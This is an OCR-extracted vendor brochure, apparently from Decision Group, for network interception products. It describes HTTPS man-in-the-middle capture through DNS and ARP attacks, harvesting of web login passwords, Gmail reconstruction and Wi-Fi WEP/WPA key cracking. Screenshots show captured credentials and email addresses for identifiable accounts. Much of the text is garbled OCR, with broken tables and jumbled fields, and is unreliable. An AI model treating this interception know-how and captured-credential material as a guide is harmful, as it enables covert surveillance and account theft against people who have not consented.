192.168.1.199 feport **** — 192168.185 DE SELECT AUTO, DATETIME, ACCOUNT,..MYSQL là A 


192.168.1.199/ report DS 192.168.1.85 DE SELECT COUNT( AUTO) FROM HTTPLOG MYSQL =a a, 


14. [] EE 192.168.1.199 report ses — 192168.185 DE SELECT count(*) FROM HTTPLOG mysa TL à 
15.C] Zuse 192168.1/199 report ` o — 192168.185 DE SELECT AUTO. DATETIME, ACCOUNT,..MYSQL PI A 


Total 927 Total Page 186 Current Page 3 


* SQLLOG Search 
:}2012-01-01 & ~ (2012-01-01 |& 


> List of all DB Transactions 


[ 
vl. v. | vo. v 


[Search Method: (Exact | © Similar 
: 192.168.1.200 More IP... 
Search Method: @Exact | © Similar 


> Conditional Search on all DB 
Transaction Records 


> Works on MySQL, MS SQL Server 
and Oracle DB 


User: 


DB Name : Search Method: @Exact | © Similar 


Sample — MS CIFS Reconstruction 


Even Pages| ai] Cont] 


Account Username Action# Servert Path File Name Size? uim Whols 


2012-01-01 03:14 vic Vic Download 192 168.1 111 SHAREIDGE "CSS ED-DEC-2.16.2023 MANUAL CH doc 19.50M fa a, 
2012-01-01 03:13:56 vic Vic Download 192.168.1.111 SHAREIDGE CSS ` CAT5E 20m2 j jpg 26.96K M a, 
2012-01-01 02:04:16 VHIPPCLASS stretch Download 192.168.1.111 PUB\client\decisi... update ED-DEC-2 17 2001.633-111223-1543 tgz 187.60M fa g 
2012-01-01 02:02:33 IPPCLASS stretch Download 192.168 1.111 PUBiclient\decisi... update ED-DEC-2 16 2015 238-110209-1552 taz 177M EL a 
Total 4 Total Page 1 Current Page 1 


* CIFS Search 
Date 2012.01.01 & ~[2012.01-01 © 


> List of all MS File Server Transactions 


| Time: v: v.| v: v 
[Sear od: (Exact | O Similar ~ D e 
ef maa Sg > Conditional Search on all MS File 
2 Server Transaction Records 


Action nem v 


|Search t Method: (Exact | O> Similar 
1 192 .168.1 237 


|Search Method: @Exact | © Similar 
File Name 


| [Search Method: O Exact | © Similar 


> Works on MS Windows File Server 
and Clients 


Server: 


——Á— — 


| Search Method: @Exact | © Similar 


8. 


Account :| + 
| 


"u 
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Wireline Ethernet Interception & 
Real-Time Reconstruction Series 
HTTPS/SSL MITM Interception 
System 


Introduction to HTTPS/SSL MITM Interception 


HTTPS/SSL Interception Appliance (Software + Hardware) 
User can opt to purchase only software from us and use their 
own hardware/server. 


% Intercept HTTPS/SSL traffic (connection sessions) by MITM attack or by Proxy 
setup. HTTPS/SSL MITM Interception system is standalone system. HTTPS/SSL 
Proxy is another standalone system. 

* HTTPS/SSL Interception by MITM mode is carried out utilizing both DNS and 
ARP attacks or utilizing the PBR of the L3/4 switch/router. 

** HTTPS web pages on targeted user can be decrypted, decoded and 
reconstructed. Username and password can also be obtained for Web Login. 

% Intercept standard HTTPS/SSL traffic without additional security. 

€ HTTPS/SSL Interception by Proxy mode required the target users’ Web Browser 
to be pre-configured to use the Proxy service. 


Solution for: 
Lawful Enforcement Agencies (Police Intelligence, Military Intelligence, National Security, 
Counter Terrorism, etc) and corporate organizations. 


HTTPS/SSL MITM Interception System (Method 1) 


WEB BASED 55L SERVERS 
Ex: 55L Google Account, 
Yahoo Account 


HTTPS/SSL Interception 
By MITM Attack Methodology 


SERVERS 


Router/Firewall 


= Manage 
Administrator 


SERVER FARM 


SWITCH/HUB HTTPS/SSLMITM 


Man-in-the Middle 
— = Attack 


USERS W|. Y Intercept and reconstruct HTTPS/SSL 
Ec traffic. Obtain HTTPS page login 

username and password. Intercept on 

Targeted User specific targets (suspects) 


HTTPS/SSL MITM Interception System (Method 1) 


va HTTPS/SSL Interception by MITM mode is carried out utilizing both DNS 
and ARP attacks. (Methodology 1) 


* HTTPS web pages on targeted user can be decrypted, decoded and 
reconstructed. Username and password can also be obtained for Web 


Login. 

% Target User (Suspect) IP Address must be known or pre-configured in the 
setup of HTTPS/SSL Interception system. 

* Target Website Links (URLs) must also be pre-configured. 

** Concurrently attack up to 5 users (Optional for more users). 


To view encrypted content, 
a key is a needed 


HTTPS/SSL MITM Interception System (Method 2) 
| 


INTERNET Web Server 
SSL 
Gateway 2 
Router 
MX Gateway 
Router 
" " HTTPS MITM 
~ e 
> < x 


COUTE. 


Targeted HTTPS traffic needs to 
be routed or redirected to this 
MITM system. 


L3/4 Core 
Switch 
(Policy Routing 

Function) 


Note: This is just 
[>> T> Ee up a sample scaled 


~ down diagram 
ISP Subscribers Networks for illustration 


g 
gé 
@ 
AM 


HTTPS/SSL MITM Interception System (Method 2) 


*% HTTPS MITM Interception System is implemented to decrypt HTTPS 
traffic (ex: Gmail as target). Subscribers side HTTPS (ex: Gmail) traffic 
accessed needs to be rerouted to the HTTPS MITM Interception system. 
The system has NAT built in that can reroute the traffic to the Web 
Servers (ex: Gmail). 

** For example, Web Server IP X.X.X.X (ex: Gmail) accessed traffic being 
redirected (using PBR) to the HTTPS MITM Interception system from the 
Core Switch (L3/4 switch) or the Core Router from Subscribers network 
end. 

** HTTPS Web access content (ex: Gmail Read and Sent) of the targeted 
user can then be reconstructed in real-time by the HTTPS/SSL MITM 
Interception System. 

** Username and Password can also be obtained. 

** Usually this is for large scale implementation such as Enterprise 
network, Government organization network or LI ISP interception. 


HTTPS/SSL Proxy Interception System 


WEB BASED 55L SERVERS 
Ex: 55L Google Account, 
Yahoo Account 


HTTPS/SSL Interception 
By Proxy Methodology 


Router/Firewall 


° Manage 
Administrator 


SERVER FARM l 
SWITCH/HUB 


HTTPS/SSL Proxy 


Sniffer Mode + Proxy 
Mode 


Intercept and reconstruct HTTPS/SSL traffic 
and protocols/services supported by proxy. 
Intercepton group of users (with proxy pre- 
configured on target users Web Browsers) 


Targeted Users Group 


HTTPS/SSL Proxy Interception System 


HTTPS/SSL Interception by Proxy implementation. 

Proxy pre-configured on the targeted user(s) ‘ Web Browser is required. 
HTTPS/SSL Interception by Proxy implementation can supports other protocols 
capturing and reconstruction besides HTTPS/SSL traffic. 

Some supported protocols are: Webmail (Yahoo Mail, Gmail, Hotmail etc.), IM 
(Yahoo, MSN, ICQ, IRC, QQ, Web MSN, Web Yahoo etc.), HTTP Web Browsing, 
P2P and Online Games). 

Can be implemented to a group of users (more than 100 concurrent 
interception) 

HTTPS/SSL decryption only apply to standard HTTPS/SSL traffic without 
additional security. 


To view encrypted content, 
a key is a needed 


ED2S - Interception of Username & Password 


URLs browsed by Target IP 


Login user name of URL 


Qe 
€ Account/Password | Q. Search. Every Page:[ 29|| Gomm ] 


No Date-Time User IP User Password Description 


1. 2010-08-04 13:06:57 192 168 2 101 ërëm esmero? https /www.google com/accounts/ServiceL oginAuth 

2. 2010.08.04 13:15:13 192 168 2 101 acsi GES https-//login yahoo.com/config/login? 

3. 2010-08-04 13:15:13 192 168 2.136 eo] https //www.google.com/accounts/ServiceL oginAuth 

4. 2010.08-04 13:16:15 192 168 2 136 cine xag Gn Perte ty https-//www.amazon convgp/flex/sign-in/select.html 

5. 2010-08-04 13:18:19 192 168 2 136 Edu https-//www citibank.com.tw/TWGCB/JSO/signon/Proce 
6. 2010-08-04 13:19:21 192 168 2 136 SES, https -//www.global-ebanking.com/iiop/CPM1^? 

7. 2010-08-04 13:19:22 192 168 2 136 sët, https //www amazon com/gp/history/external/full-rh 

8. 2010-08-04 13:42:05 192.168 2 101 Cree p https //www.google.com/accounts/ServiceL oginAuth 

9. 2010-08-04 13:54:29 192 168 2.101 [a se https //www.google.com/accounts/ServiceLoginAuth 

10. 2010-08-04 13:54:29 192 168 2 101 hansassa https'/Iwww. google com/accounts/ServiceLoginAuth 

11. 2010-08-05 14:27:20 192.168 2.136 aiea ecm com https www google com/accounts/ServiceLoginAuth 
wai» Total 11 Total Page 1 Current Page 1 


Targeted IP 


Login Password of URL 


Sample Gmail Read Reconstruction 


7 Webmail(Read) | W Delete | & Search |; Account List Every Page| 10| 


No. r! 6 Date-Time Account Sender Subject Webmail Type Similan 
1. 2011-10-28 20:36:48 192.168.1.12 tI1022@126.com + M1 Bzb[E RS: Bandwidth Monitor Alert GMail a 
2 2011-10-28 20:36:48 192.168.1.12 010229126.com + ©) 1 53E: Bandwidth Monitor Alert GMail fal 
3. 2011-10-28 20:36:48 192.168.1.12 01022126.com + H1 BspE]£: Bandwidth Monitor Alert GMail 7 
4. 2011-10-28 20:36:43 192.168.1.12 010229126.com + H1 BH: Bandwidth Monitor Alert GMail a 
5. 2011-10-28 20:36:43 192.168.1.12 010229126.com + 9 1 SS: Bandwidth Monitor Alert GMail fal 
6. 2011-10-28 20:36:36 192.168.1.12 RM ti © testtttt GMail fal 
T. 2011-10-28 20:36:36 192.168.1.12 decisiongroup2010 ggrf GMail a 
8. 2011-10-2P e GMail [7l 
9. 2011-10-2 amete 6 GMail wi 

FROM : decisiongroup2010@gmail.com ° n H ; 
10. 2011-10-2 BS (aka espa joc is Notification (Failure) GMail fei 
Wa 12» MEnterPa] ewer enam Total 13 Total Page 2 Current Page 1 
! Jun 
Í Decision 27 
Í Group <decisiongroup2010@gmail.com> 10:39 
AM 
To: Decision Group 
<decisiongroup2010@gmail.com> 
3453434534534534 


x Gmail 


byC Mat gle 


Sample Gmail Sent Reconstruction 


Every Page|_10|| Conf | 


Ed Webmail (Sent) | i Delete | RS Pass Show | & Search | :S Account List 


= : z Webmail Similar 
No. O Date-Time Account Sender Password Receiver CC BCC Subject Type Search 
2011-10-28 B Ak ; i ] 
1. 20:37:24 192.168.1.12 decisiongroup20... frankie@deci... GMail - 


TE > _ SS 
E https;//192. — ie et TYPE=38&_AUTO=14&mime_val= - Windows Internet Explorer — ka 


Total 1 Total Page 1 Current Page 1 


: decisiongroup2010(g gmail.com 

: 2011-10-28 20:37:24 

` frankie@decision-groups.com 
SUBJECT: Email from 


This is a message for the XXX> 
Thanks. 


Regards, 
FC 


Gmail 


| byGoc gle 


Wireline Ethernet Interception & 
Real-Time Reconstruction Series 
E-Detective Backup Server System 

(Data Retention) 


Introduction to E-Detective Backup Server 


° E-Detective Backup Server (BS) is designed for viewing 
Backup ISO Data (Reconstructed Data backup by E-Detective 
System). 

e Provides a User Friendly GUI. Easy to import (mount ISO) and 
view the Backup Content especially for large amount of 
Backup ISO Files. 


e Capable to mount and view multiple Backup ISO Files at the 
same time. 

e Works with E-Detective system for Auto FTP Backup function. 
Allow Auto Backup ISO File in E-Detective to be stored in 
Backup Server. 

e Search and Advance Search functions provided to search into 
Backup ISO Content or specific Backup ISO Content. 


° Easy Management of Backup ISO Files. g- d oh 
n 


Sample Screenshots of ED Backup Server (1) 


Home Page ISO File List (Mounted Backup ISO) 


je HOMEPAGE! Kò 


ÖSO File List | Á Mount ISO File | 2/Delete ISO File | 7 cud uMount ISO File Record/Page 


[7] Status ISO File Name Create Time Backup Mode File Size 
1O e DC100315NQ8V M 20100627220342 2010-06-27 22:03:42 Manual 237MB 
2[] e DC100315NQ8V M 20100614135017 2010-06-14 13:50:17 Manual 78MB 
“415 Total 2 Total Page 1 Current Page 1 


Home Page - ISO File Content — Service Categories Statistics 


à. HOMEPAGE | 09 


fit ISO File Content — — 100 
ISO File Name € 4€ GO ging A BE CO c UK 9 e =e A Bu o 

Summay: 30 0 15 6 66 2 0 0 0 3 0 O 1 1538 1387 52 56 0 4 3 0 O0 0 71897 
1lQDcioosisNQsV M 20100627220342 29 0 11 6 66 2 0 0 0 3 0 0 1 1276 1148 36 49 0 4 3 0 0 0 57,801 
2QDcioosisNQsV M 20100614135007 1 0 4 0 0 00000000 26 23 16 7 0 0 0 0 0 0 14,096 
i «1» Total 2 Total Page 1 Current Page 1 


Sample Screenshots of ED Backup Server (2) 


IR T € sere. EI sTORAGEINFOMATIONI gs SYSTEMI "i MODIFY PASSWORD | ( UPDATE | oF REGISTER | " 


fi} ISO File Content. — I : 100 


ISO File Name € $ C gos A S WOE EY 6 SS ee e 
2 
2 
0 


! Summary: 30 0 15 6 66 0 0 1 1538 52 56 0 4 3 0 0 O 71,897 
1@DC100315NQ8V_M 20100627220342 29 0 11 6 66 PG 49 0 4 3 0 0 0 57,801 
2@DC100315NQ8V_M 20100614135017 1 0 4 0 0 16 7 0 0 0 0 0 O 14,096 


co oW» es 
co o m bi 
2 


0 
0 
0 


° GA Ww 
e 
e 
ab 
ab 
N 


i «1» Total 2 Total Page 1 Current Page 1 
[PY] G) seme. dH] sTORAGEINFOMATIONI Ü SYSTEMI 2 MODIFY PASSVÍÐRDI @ UPDATE| tP REGISTER | 
ee SEGAR? @ so MRO SABO ° 
29 0 11 1 124p 1148 36 49 0 57801 
HTP Content | Search em Every Page : | = ETE 
No. Date- TE Account Content 
101. 2010-06-23 17:00:47 frankie (1% Bet-at-Home Exi 
102. 2010-06-23 17:00:45 frankie (:%Bet-at-Home 
[ queer A e Sc -06-23 17:00:44 frankie FJSogoogleads g.douleclick.net 
UY == 2 = = —m 23 17:00:42 frankie IS World Cup 2010 [| Soccer / Football Live Scores 
Elle Edit View Favorites Tools Help 
di Favorites | Q Juventus Sign Custodian Marco Storari - - The Of. || Ñ > E) + C) gë + Pager Safety~ Tock: @+ C -06-23 17:00:39 frankie 
@ To help protect your security, Internet Explorer has blocked this website from displaying content with security certificate errors. Click here for options... - x | 5 Juventus Sign Custodian Marco Storari - - The Offside - Juventus Football Blog 
eege Ee re Je 17:00:36 frankie EJSeFaceboo g 
passed with fying colours - ||-06-23 16:59:59 frankie I &Bet-at-Home Extra 
Storari represents a much needed option next season between the pipes as Chimenti is turns 40 this June, and Manninger’s allure seems to fade more and more as 
games go by. By many accounts, Marco should be able to challenge Alex for that number two spot behind Gigi as he's proved to be very capable with solid -06-23 16:59:54 frankie HAAT 
displays for Sampdoria and Milan this season 
Milan, who has secured the services of Marco Amelia to replace Storari, was originally in talks with Sampdoria's Gasparin earlier this month about a permanent -06-23 16:59:53 frankie AOL Advertising's Boxii - Loading 


stay for Storari. However talks broke down on account of a disagreement in the asking price. But now with the ex-Samp duo Marotta and Del Neri at Juventus, 
their impressions of Storari whilst playing for them last year were highly regarded enough to warrant a higher bid from the Bianconeri. -06-23 16:59:53 frankie TPP 


"Im not scared at having to replace Buffon. I have already performed this role for Christian Abbiati, Nelson Dida and Zeljko Kalac at Milan. I -06-23 16:59:53 frankie Is Utarget FOX videoSub 
started a season as the fourth choice goalkeeper and ended up being first pick. I will do my work with a relaxed attitude. I am very happy to be at 
Juve. It's a great honour to play for this team and we can challenge for major objectives, Storari. “I accepted Juve's proposal because this -06-23 16:59:52 frankie O) otag. admeld.com 
is a big club and signed me by spending a pretty penny. That's very satisfying to know. It's also true that the presence of former Sampdoria men 


Gigi Del Neri and Beppe Marotta was decisive in my choice.” -06-23 16:59:52 frankie Is btag admeld.com 
According to reports, we've signed the goalkeeper from Pisa on a three-year contract with the salary somewhere around the €1 million mark per season. In terms OG- d 
of the transfer fee between the two clubs, not much is know at the moment aside from Storari's "pretty penny" comment, but stay tuned for more details that will 06-23 16:59:51 frankie I bad yieldmanager com 
be `d in th ion below. ` 
NEE -06-23 16:59:50 frankie I btag.admeld.com 


Marco Storari - The Silent mo J -06-23 16:59:48 frankie (1 www4.smartadserver.com E 
| »» Enter Page [ |! Total 1,148 Total Page 58 Current Page 6 


@ Internet | Protected Mode: Off fay 100% + 


d (® Done 


Sample Screenshots of ED Backup Server (3) 


ml 18 setup) E STORAGEINFOMATIONI Ü SYSTEMI 7i MODIFY PASSWORD | ( UPDATE | oP REGISTER | — 


fa} iso Record/Page : 100 


| Advance Search 


e z ^ 9 $9 25 o 9 
EEN, J.A 8. 8 1.00 19 0,0 0 0 .. o n a 
1 @ pc100315NQ8V M 20100627220342 10 0 8 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
2 @ DC100315NQ8V_M_20100614135017 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0- 0 0-9 


“41 Total 2 Total Page 1 Current Page 1 


— ——— = 


[Y H seui dil sTORAGEINFOMATIONI Ü SYSTEM] “ñ MODIFY PASSWORD | @ UPDATE| ' REGISTER | I 


EE UE EE EE 


HTTP Link | & Search Every Page : 
No. Date-Time Account HOST 
LA 2010-06-23 12:33:06 frankie Decision Group - E-Detective 
2: 2010-06-23 11:23:32 frankie Decision Group - E-Detective 
3. 2010-06-23 09:14:08 defenceorg Decision Group - E-Detective 
4. 2010-06-23 09:14:05 defenceorg Decision Group - E-Detective 
5. 2010-06-23 09:14:05 defenceorg Decision Group - E-Detective Free Text Search 
6. 2010-06-23 09:14:03 defenceorg Decision Group - E-Detective 
rd 2010-06-23 09:13:55 defenceorg Decision Group - E-Detective Fu nctio n 
8. 2010-06-23 09:13:51 defenceorg Decision Group - E-Detective 
9. 2010-06-23 09:13:48 defenceorg Decision Group - E-Detective 
10. 2010-06-23 09:13:47 defenceorg Decision Group - E-Detective 
11. 2010-06-23 09:13:41 defenceorg Decision Group - E-Detective 
12. 2010-06-23 09:13:41 defenceorg Decision Group - E-Detective 
13. 2010-06-23 09:13:39 defenceorg Decision Group - E-Detective-Network Forensics | Lawful Interception | Data Retention Solutions 
14. 2010-06-23 09:13:38 defenceorg Decision Group - E-Detective 
15. 2010-06-23 09:13:35 defenceorg Decision Group - E-Detective 
16. 2010-06-23 00:59:58 defenceorg Decision Group - E-Detective 


Wa 1» Total 16 Total Page 1 Current Page 1 


Sample Screenshots of ED Backup Server (4) 


|& HOMEPAGE o SETUP | Á] STORAGEINFOMATION | Ü SYSTEM | A MODIFYPASSWORD | ( UPDATE | oP REGISTER | 


fat ISO File Content x Reeecd/Page : 100 
' - Advance Search - 


see 
ISO File Name @ 4 X wa pa A S sa A <+ UT | & 


— Summary : 30 0 15 Search Parameters Search Category Histo} [ 
19Dci00315NQ8V M 20100627220342 29 0 11 Date - 1 
29DC100315NQ8V M 20100614135017 1 0 4 Time : "m 3 
"PEE" Source IP : š 
Destination IP : 
Email Address : |. $ c 
- $u 
Subject : 
pea o SETUP | Á] STORAGE INFOMATION | [W SYSTEM] "7. MODIFY PASSWORD | ( UPDATE | oP REGISTER | dz 


—— :100 à 
ISO File Na — n c eng Ro E E r = = "m 
Summary: 16 0 11 6 66 5 0 0 0 3 0 0 1 134,4 36 51 0 2 3 0 0 0 04 | 
1 9 DC100315NQ8V. M 20100627220342 16 0 11 6 66 5 0 0 0 3 0 0 1 3 4 0 2 3 0 00 0 
2 @ DC100315NQ8V_M_20100614135017 0 0 0 0 0 0 00000 0 0 0200 0 0 0 0 oh 


i «1» Total 2 Total Pana 1 Current Pane 4 _ =p 
= | & HOMEPAGE | | €} setup | Á] STORAGE INFOMATION | 3 SYSTEM | MODIFY PASSWORD | @ UPDATE! `” REGISTER | 


SIS rari 3698 = Ure 8 935 @ REEL E ot 


29 70 T 1 1276 1148 36 0 57801 

@HTTP Content | & Search Every Page : = [ Confirm | 
No. Date-Time Account Content 

Ad vance Sea rc h 1 2010-06-23 17:51:09 frankie I tag. admeld.com 
= 2: 2010-06-23 17:50:54 frankie EJSswww.google.com.sg 
Fu nction 3. 2010-06-23 17:49:55 frankie Abad sensismediasmart.com.au 

4. 2010-06-23 17:49:55 frankie I bmedrx.sensis.com.au 
S: 2010-06-23 17:49:43 frankie Is Sb Whois record for 117.4.193.88 


4123456789 »» Enter Page L] [ co | Total 1,148 Total Page 230 Current Page 1 


Wireline Ethernet Interception & 
Real-Time Reconstruction Series 
Central Management System (CMS) 


Coming 


Soon! 


Introduction to CMS 


> Global view (with Centralized Web GUI Portal) of huge 
network Internet traffic through distributed or 
multiple E-Detective systems (at same or different 
locations). 


» Status information of all ED, ED2S and ED Backup 
Server Systems. 


> Easily aggregate, manage and configure multiple E- 
Detective systems, ED2S System (HTTPS/SSL MITM 
Interception System), ED Backup Server Systems. 


> Centralized reporting. 
> Centralized full text search and query function. 


CMS Implementation Architecture 


E-Detective System 
Center Management System 


- a8 


Auditor/User 


-——-Management/Query ——x Data Retention  -—— CMS UI 


> There are 3 segments/tier in the entire architecture: 

> 1st— Front End Capture/Probes — E-Detective, ED2S (HTTPS/SSL) 

> 2"4- Data Retention Management System - ED Backup Server System, Storage 
> 3'- Centralized Management System (CMS) 


CMS — Sample GUI (1): Homepage 


Q EE J- mum 


File Edit View Favorites Tools Help 


Home Data Management ~ Data Management ~ System Management ~ Log Out ~ 


i$nbsp;HTTP 
| Show entries Search: | 
HOST ^ TYPE $ Status $ Mail $ CHAT $ FILE TRANSFER $ HTTP $ OTHER Š 
192.168.1.122 ED-DEC Q 300 0 0 0 0 
| First Previous 1 Next Last Showing 1 to 1 of 1 entries 


Copyright € GROUP INC. All Rights Reserved. EFJ}, IEMA 


125% ~v 


CMS — Sample GUI (2) 


PII 
G os 7” Qe 
File Edit View Favorites Tools Help 
CON Home Data Management ~ Data Management ~ System Management ~ Log Out ~ 
DECISION /j 
am 
Home $nbsp;HTTP) 192.168.1.122) HTTP 
| POP3 | IMAP SMTP WEBMAILR WEBMAILS HTTP | 
Show 10 |~| entries Search: | 
DateTime $ Account $ From $ To $ CG e BCC $ Subject e Sizo— 4$ 
DD. QA decision@decision.com.tw vic@decision.com.tw ... tang0126@decision.co... Re: Release Note: 280834 
2012-01-01 | MING302071 SC Seednethi 3E St 
01:15:31 -PC 080@seed.net.tw ming@decision.com.tw ER.. 4642 
2012-01-01 MING302071 : : : SCH Sms, 
01:15:34 E seminar@sinter.com.tw ming@decision.com.tw Delphi,C... 26244 
SS = m munt returnedm@return.pec.pcstore.com.tw returnedm@return.pec... NEEN 107302 
01:15:55 -PC fk... 
y cc bec i returnedm@return.pec.pcstore.com.tw returnedm@return.pec... 12/277 10-00% ... 7751 
2012-01-01 MING302071 12/27r9:007x X. 
01:15:55 -PC returnedm@return.pec.pcstore.com.tw returnedm@return.pec... rM 16011 
GREEN 
pis e iui iu webmail@ecfscop.epaper.com.tw ming302071@pchome.co... *201 i d HA 24887 


«I 


m 


CMS Specifications 


Product: Central Management System (CMS) 


| No | Features and Specifications 


Server Hardware Specifications: HW: Asus RS300 or HP ProLiant DL380/385 
Good CPU (Quad Core, Core i3/5/7 etc.), 8-16G RAM, 2-4 HDDs (total of 2TB), 2 Gigabit NIC Interface (Recommended 
Intel Chipset) etc. 


System Software Specifications 


General Implementation 


System Management - (Web GUI) IE Browser 
Aggregate, Manage and Configure Multiple E-Detective Systems (20 E-Detective Systems at 1st stage, could expand 
subsequently). 


Provide Centralized Total Statistical Reports from Multiple E-Detective Systems 


Centralized Data Query (Search) 


Centralized Alert and Notification Rules 


Centralized Authority Management Functions 


Others - Optional: Topology Mapping 


Wireless LAN (Wi-Fi) Interception & 
Real-Time Reconstruction Series 
Wireless-Detective System 


kxKkxx<x 
Only for Government & LEA users! 


Introduction to Wireless-Detective System 


Wi-Fi /WLAN IEEE 802.11a/b/g/n Interception and Forensics 
Investigation System 


* Scan all WLAN 802.11a/b/g/n 2.4 and 5.0 GHz 
channels for Access Points and STAs. 

* Captures/sniffs WLAN 802.11a/b/g/n packets. 

* Real-time decryption of WEP key (WPA-PSK 
Optional Module) 

The Smallest, Mobile, * Real-time decoding and reconstruction of WLAN 
packets 

* Stores data in raw and reconstructed content 


Portable and most Complete 


TES * Displays reconstructed content in Web GUI 
Lawful Interception System ` e Hashed ins and back 
in the World! 


GR wie All in One System! 


Important Tool for Intelligent Agencies such as Police, Military, 
Forensics, Legal and Lawful Interception Agencies. 


Notes: Pictures and logo are property of designated source or manufacturer 


Wireless-Detective — Implementation Diagram (1) 


Wireless-Detective Standalone System - Captures WLAN packets 
transmitted over the air ranging up to 100 meters or more 
(by using High Gain and High Sensitivity Antenna! - Optional) 


Router Firewall ! 
| 


Wireless STA 
Ñ X) | 
AND —" uu» 
di ( Wireless STA J 


Wireless STA A 


Wireless STA Wireless-Detective 


Wi-Fi Interception and Investigation — Standalone Architecture 
Wireless-Detective System Deployment 
(Capture a single Wi-Fi channel, a single AP or a single STA/User) 


Wireless-Detective — Implementation Diagram (2) 


Wireless-Detective Distributed — Extreme Implementation 
Utilizing multiple/distributed Wireless-Detective systems (Master — Slave) to 
conduct simultaneous capture, forbidding and location estimation functions. 


Router Firewall 


£ Wireless-Detective WLAN Lawful Interception 


ra Slave -— š 
d s Distributed Architecture 
" wee / ` Wireless-Detective 
Ae ` 
AU , R ' Deployment 
T ; P Wireless STA \ (Utilizing min. of 2 systems for 
e KT Zë S \ simultaneous (Master & Slaves) 
» | Ju / [5 1 n a ! capturing/forbidding functions. 
T EM I ` Capture a single channel, a single AP or 
Wireless-Detective Wireless-Detective ingle STA 
(Slave) Ind (Slave) a single STA) 
m Wireless STA Wireless-Detective 
tier, “Qa => Central Management 
(Master) 


Notes: For capturing multiple channels, each Wireless-Detective (WD) can reconfigure/act as standalone system. For 
example: Deploy 4 WD systems with each capturing on one single channel. 


Wireless-Detective — AP Info — Capture Mode (1) 


Displaying information of Wireless Devices (AP) in surrounding area. 


MODE: @ AP (STA 


Capture NForbidder/ Import/ Wepkey/ History/ Compare/ Work Log/ IDS/ Import & Export Config 


Capture Size : none Notification Filter Save List Refresh: 7 Y s. Auto Stop 
By Channel 
~ | Manual | 

By Channel + AP 
AP |SCAN MANUAL BSSID CH. MB/S | KEY |STR. BEACONS PACKETS, ESSID STA Blocking 
1| © | Manual le 00:23:51:7B:4D:CA | 6 54 WEP 8 476 0 2WIRE 0 Blocking 
2 Manual le 00-21:29-99:82:B1 | 6 54 WPA 9 486 0 Hyper D | Blocking 
3| © | Manual le 00:1F:B3:2B:53:26 | 6 54 WEP li 180 0 2WIR 0 Blocking 
4| © | Manual | # 00:1D:7E:26:7B:B1 | 1 48 WPA, 12 2467 15 yeoh D | Blocking 
5| © Manual | # 00:1B:5B:AF-14:E1| 2 54 WEP Fg 394 0 dun 0 |Blocking 
6 | © | Manual Le 00:1B:5B:BD-:60:89 | 6 54 WEP, 34 928 0 2WIRES D | Blocking 
7| © | Manual | # 00:1A:C4:EF:43:B8 | 6 54 WEP ri 364 0 2WIRES 1 |Blocking 
8| © | Manual Le 00:18:39: 5A:.BC:81 | 6 48 WEP 4 300 0 Elain ` 0 | Blocking 
9 © | Manual | # 00:16:B6:E1:5B-2D | 11 54 WEP 3 3 OLIM 0 |Blocking 
10| © * 00:13:46:D1:9D:F9 | 6 [Unknown 0 0 21 1 |Blocking 
11| © Manual le 00:11:09:F7:A1:6F | 6 48 WPA, 27 1282 294 linksys. 1 | Blocking 

41> Count: 11, Total: 1, In page 1| Rows per page: 20 [Submit | Update 


Obtainable 


Information: 
MAC of Wireless 
AP/Router, Channel, 
Mbps, Key, Signal 
Strength, Beacons, 
Packets, SSID, Number 
of Stations Connected. 


Wireless-Detective — STA Info — Capture Mode (2) 


Displaying information of Wireless Devices (STA) in surrounding area. 


Hard Disk Information : - 146G / Used - 3.3G / Available - 136G / Available (%) - 97% 


Capture Forbidder/ Import/ Wepkey/ History/ Compare/ Work Log/ IDS} Import & Export Config 


MODE: © AP e STA 


Capture Size : none Notification Filter Save List Refresh: 7T e s. Auto Stop 
STA SCAN MANUAL CLIENT MAC STR. PACKETS BSSID KEY CH. | ESSID Blocking 
1 © # ip 00:21:6B:00:21:6B 10 92 | 00:19:E0:00:19-E0 6 Blocking 
2 © # ip 00:1E:58:00:21:6B 4 3 00:21:91:00:19:E0 1 Blocking 
3 © Manual |: ip 00:1D:E0:00:21:6B 45 43 00:11:09:00:11:09 | WPA | 6 linksys Blocking 
4 © Manual |: ip 00:1D:E0:00:1D:E0 0 1/00:16:B6:D1:9D:F9 | WEP | 11 UM Blocking 
5 © # ip 00:18:DE:00:1D-E0 5 1 FF:FF:FF:FF:FF:FF -1 Blocking 
elo # ip 00:15:C1:00:1D:E0 3 11/00:19:E0:00:11:09| — | 6. Blocking 
7 © # ip 00:14:A5:00:1D:E0 15 T |FF:FF:FF:FF:FF:FF -1 Blocking 
8 © # ip 00:13:46:00:13:46 10 1428 | 00:22:B0:00:11:09 6 Blocking 
9 © # ip 00:11:50: 00:13:46 4 10 FF:FF:FF:FF:FF:FF -1 Blocking 
Mai» Count: 9 , Total: 1, In page 1| Rows per page: 20 [ Submit | Update 


Obtainable Information: 
Client MAC Address, Signal Strength, Packets, AP MAC Address, Key (Encrypted or 
Unencrypted), SSID. 


Cracking/Decryption of WEP/WPA Key (1) 


WEP Key Cracking/Decryption can be done by Wireless-Detective System! 


Auto Cracking (System Default) or Manual Cracking 


1) WEP Key Cracking/Decryption:-- (64, 128, 256 bit key) 
Active Crack — By utilizing ARP packet injection (possibly 5-20 minutes 
Passive Crack — Silently collect Wireless LAN packets 

64-bit key — 10 HEX (100-300MB raw data /100K-300K IVs collected) 
128-bit key — 26 HEX (150-500MB raw data /150K-500K IVs collected) 


2) WPA-PSK Key Cracking/Decryption:-- (Optional Module Available) 
WPA-PSK cracking is an optional module. By using external server with 
Smart Password List and GPU Acceleration Technology, WPA-PSK key 

can be recovered/cracked. 


Notes: 

The time taken to decrypt the WEP key by passive mode depends on amount network activity. 
The time to crack WPA-PSK key depends on the length and complexity of the key. Besides, it is 
compulsory to have the WPA-PSK handshakes packets captured. 


Cracking/Decryption of WEP Key (2) 


Automatic: System auto crack/decrypt WEP key (default) 
Manual: Capture raw data and crack/decrypt WEP key manually 


Kl MENU ^ Hard Disk Information : - 146G / Used - 3.3G / Available - 136G / Available (%) - 97% 

TW Capture \Forbidder/ Import/ Wepkey/ History/ Compare Work Log/ IDS/ Import & Export Config Y 
pecu MODE: @ AP ©STA 

*-q& IMAP (14) M 

E īa WEBMAIL (READ) Capture Size : none Notification Filter Save List Refresh: 7 v s. Auto Stop 
: ` WEBMAIL (SENT) ( "We 

E MSN (18) - 

: ICQ (7) + | Manual | 

i i EES By Channel+ AP 

E e QQ (10) E : - . 

ts UT UT (1) AP SCAN MANUAL BSSID CH.MB/S| KEY STR. king 


17 


